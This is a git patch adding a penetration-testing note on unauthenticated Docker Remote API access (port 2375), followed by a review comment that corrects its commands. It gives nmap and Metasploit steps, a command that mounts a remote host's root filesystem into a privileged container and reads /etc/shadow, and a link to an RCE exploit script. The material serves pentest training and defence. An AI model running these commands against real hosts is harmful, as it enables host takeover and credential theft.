From 4b9384c19ae1534f933f4526b78e0058c2864ec6 Mon Sep 17 00:00:00 2001 From: Nicolas Krassas Date: Tue, 15 Dec 2020 09:31:28 +0200 Subject: [PATCH] 2375-pentesting-docker Adding information on pentesting Docker Remote API --- pentesting/2375-pentesting-docker | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 pentesting/2375-pentesting-docker diff --git a/pentesting/2375-pentesting-docker b/pentesting/2375-pentesting-docker new file mode 100644 index 00000000..0c336e7e --- /dev/null +++ b/pentesting/2375-pentesting-docker @@ -0,0 +1,29 @@ +# 2375 - Pentesting Docker API + +## Basic Information + +Remote API is running by default on 2375 port when enabled. The service by default will not require authentication allowing an attacker to start a priviledged docker container. By using the Remote API one can attach hosts / \(root directory\) to the container and read/write files of the host\'s environment. + +**Default port:** 2375 + +```text +PORT STATE SERVICE +2375/tcp open docker +``` + +## Enumeration + +```bash +msf> use exploit/linux/http/docker_daemon_tcp +nmap -sV --script "docker-*" -p +``` + +## Exploitation + +Check if it's vulnerable to execute arbitrary code: +```text +docker -H :2375 run --rm -it --privileged --net=host -v /:/mnt alpine +cat /mnt/etc/shadow +``` + +* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py)
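Review bot: the enumeration and exploitation commands in this hunk do not run as written. `nmap -sV --script "docker-*" -p` gives `-p` no port list and names no target; it should read `nmap -sV --script "docker-*" -p 2375 <target>`. Likewise `docker -H :2375 run --rm -it --privileged --net=host -v /:/mnt alpine` omits the remote host, so `-H` should be `tcp://<target>:2375` (an explicit `tcp://` scheme avoids the client guessing the transport), and it is worth stating that `cat /mnt/etc/shadow` is typed inside the container shell that the `run -it` drops you into, since the code block shows the two lines as if they were one host-side sequence. Minor wording and markup in the same hunk: "priviledged" should be "privileged", "attach hosts / \(root directory\)" should be "mount the host's / (root directory)" without the backslash escapes, and "host\'s" should be "host's". The `msf> use exploit/linux/http/docker_daemon_tcp` line is an exploit module rather than an enumeration step, so it fits better under the Exploitation heading, and the exploitation fence should be tagged ` ```bash ` like the one above it rather than ` ```text `.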